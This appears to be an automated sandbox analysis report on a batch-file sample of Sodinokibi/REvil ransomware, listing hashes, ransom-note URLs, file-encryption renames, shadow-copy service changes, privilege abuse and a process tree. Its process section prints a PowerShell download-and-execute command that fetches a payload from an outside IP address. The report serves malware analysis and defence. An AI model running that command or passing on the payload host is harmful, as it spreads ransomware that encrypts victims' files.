Analysis
Max time kernel: 87s
Max time network: 90s
Platform: windows10_x64
Resource: win10v200722
Submitted: 22-08-2020 21:10
Static task: static1
Behavioral task: behavioral1
  Sample: 148191c5edb43b691f1df387dc563507.bat
  Resource: win7
Behavioral task: behavioral2
  Sample: 148191c5edb43b691f1df387dc563507.bat
  Resource: win10v200722
General
Target: 148191c5edb43b691f1df387dc563507.bat
Size: 216B
MD5: 136cfde5a2f54a7d8742d25570058e5c
SHA1: 4c5f2992b01fa216311c261996c0ac751485f533
SHA256: 9988e330f6441a383a3c4b89544670f2ea60dbb9c587cb938fe71dee77003391
SHA512: 5328bc43411d7761f39c13c213cb10f6da9b81be55e8031ab77ca34fd1aeeac7d0290cd86ba0951d5f232e43fd3a738a54c601dd0c1518481750758e2611eca3
Malware Config
Extracted from: http://185.103.242.78/pastes/148191c5edb43b691f1df387dc563507
Extracted from: C:\30972ehjnb-readme.txt
Family: sodinokibi
URLs:
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/847FCBD1B7E34899
  http://decryptor.cc/847FCBD1B7E34899
Signatures

Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.

Blacklisted process makes network request (1 IoC)
Processes (flow / pid / process):
  - flow 1 / pid 3652 / powershell.exe
Modifies extensions of user files (5 IoCs)
Ransomware generally changes the extension on encrypted files.
Processes (description / ioc / process):
  - File renamed: C:\Users\Admin\Pictures\UnregisterDisconnect.crw => \??\c:\users\admin\pictures\UnregisterDisconnect.crw.30972ehjnb / powershell.exe
  - File renamed: C:\Users\Admin\Pictures\HideResolve.crw => \??\c:\users\admin\pictures\HideResolve.crw.30972ehjnb / powershell.exe
  - File renamed: C:\Users\Admin\Pictures\InstallRestart.tif => \??\c:\users\admin\pictures\InstallRestart.tif.30972ehjnb / powershell.exe
  - File renamed: C:\Users\Admin\Pictures\PushUnpublish.png => \??\c:\users\admin\pictures\PushUnpublish.png.30972ehjnb / powershell.exe
  - File renamed: C:\Users\Admin\Pictures\SearchCheckpoint.png => \??\c:\users\admin\pictures\SearchCheckpoint.png.30972ehjnb / powershell.exe
Enumerates connected drives (3 TTPs)

Modifies service (2 TTPs, 5 IoCs)
Processes (description / ioc / process):
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer / vssvc.exe
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} / vssvc.exe
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer / vssvc.exe
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer / vssvc.exe
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer / vssvc.exe

Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes (description / ioc / process):
  - Set value (str): \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\34z4898.bmp" / powershell.exe
Drops file in Program Files directory (39 IoCs)
Processes (description / ioc / process):
  - File opened for modification: \??\c:\program files\BlockMount.js / powershell.exe
  - File opened for modification: \??\c:\program files\EditDismount.zip / powershell.exe
  - File opened for modification: \??\c:\program files\SubmitPop.aifc / powershell.exe
  - File opened for modification: \??\c:\program files\WatchReceive.ADT / powershell.exe
  - File opened for modification: \??\c:\program files\AddInvoke.wax / powershell.exe
  - File opened for modification: \??\c:\program files\CompressFind.potx / powershell.exe
  - File opened for modification: \??\c:\program files\ResolveOptimize.vbe / powershell.exe
  - File opened for modification: \??\c:\program files\UseWrite.mid / powershell.exe
  - File opened for modification: \??\c:\program files\ClearStart.TTS / powershell.exe
  - File opened for modification: \??\c:\program files\ConnectInstall.xlsm / powershell.exe
  - File opened for modification: \??\c:\program files\ConvertFromRemove.edrwx / powershell.exe
  - File opened for modification: \??\c:\program files\ExpandFormat.ppt / powershell.exe
  - File opened for modification: \??\c:\program files\RevokeUse.css / powershell.exe
  - File opened for modification: \??\c:\program files\SubmitLock.raw / powershell.exe
  - File created: \??\c:\program files\30972ehjnb-readme.txt / powershell.exe
  - File opened for modification: \??\c:\program files\DebugSearch.xlsx / powershell.exe
  - File opened for modification: \??\c:\program files\DismountExit.xhtml / powershell.exe
  - File opened for modification: \??\c:\program files\PopEnable.xlt / powershell.exe
  - File opened for modification: \??\c:\program files\RemoveExport.rtf / powershell.exe
  - File opened for modification: \??\c:\program files\RenameEdit.rle / powershell.exe
  - File opened for modification: \??\c:\program files\SetRepair.xltm / powershell.exe
  - File opened for modification: \??\c:\program files\CompareMount.pub / powershell.exe
  - File opened for modification: \??\c:\program files\ConfirmEnter.tiff / powershell.exe
  - File opened for modification: \??\c:\program files\DismountResume.wav / powershell.exe
  - File opened for modification: \??\c:\program files\LockRestart.asf / powershell.exe
  - File opened for modification: \??\c:\program files\PopExpand.clr / powershell.exe
  - File opened for modification: \??\c:\program files\PopUninstall.pptm / powershell.exe
  - File opened for modification: \??\c:\program files\RegisterAssert.mp3 / powershell.exe
  - File created: \??\c:\program files (x86)\30972ehjnb-readme.txt / powershell.exe
  - File opened for modification: \??\c:\program files\UpdateExit.xps / powershell.exe
  - File opened for modification: \??\c:\program files\ApproveSubmit.doc / powershell.exe
  - File opened for modification: \??\c:\program files\ClearBackup.wmv / powershell.exe
  - File opened for modification: \??\c:\program files\DismountRestart.vdw / powershell.exe
  - File opened for modification: \??\c:\program files\ResetStep.mp3 / powershell.exe
  - File opened for modification: \??\c:\program files\ResolveRedo.otf / powershell.exe
  - File opened for modification: \??\c:\program files\SetFormat.pdf / powershell.exe
  - File opened for modification: \??\c:\program files\UpdateSelect.rm / powershell.exe
  - File opened for modification: \??\c:\program files\ExpandUnpublish.mpeg / powershell.exe
  - File opened for modification: \??\c:\program files\SuspendStart.wax / powershell.exe
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes (pid / process):
  - 3652 / powershell.exe
  - 3652 / powershell.exe
  - 3652 / powershell.exe
  - 3652 / powershell.exe
  - 3652 / powershell.exe

Suspicious use of AdjustPrivilegeToken (6 IoCs)
Processes (description / pid / process):
  - Token: SeDebugPrivilege / 3652 / powershell.exe
  - Token: SeDebugPrivilege / 3652 / powershell.exe
  - Token: SeTakeOwnershipPrivilege / 3652 / powershell.exe
  - Token: SeBackupPrivilege / 1564 / vssvc.exe
  - Token: SeRestorePrivilege / 1564 / vssvc.exe
  - Token: SeAuditPrivilege / 1564 / vssvc.exe

Suspicious use of WriteProcessMemory (3 IoCs)
Processes (description / pid / process / target process):
  - PID 3952 wrote to memory of 3652 / 3952 / cmd.exe / powershell.exe
  - PID 3952 wrote to memory of 3652 / 3952 / cmd.exe / powershell.exe
  - PID 3952 wrote to memory of 3652 / 3952 / cmd.exe / powershell.exe
Processes

C:\Windows\system32\cmd.exe (PID 3952)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\148191c5edb43b691f1df387dc563507.bat"
  - Suspicious use of WriteProcessMemory

  Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 3652)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/148191c5edb43b691f1df387dc563507');Invoke-GCMRWEZUO;Start-Sleep -s 10000"
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\vssvc.exe (PID 1564)
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken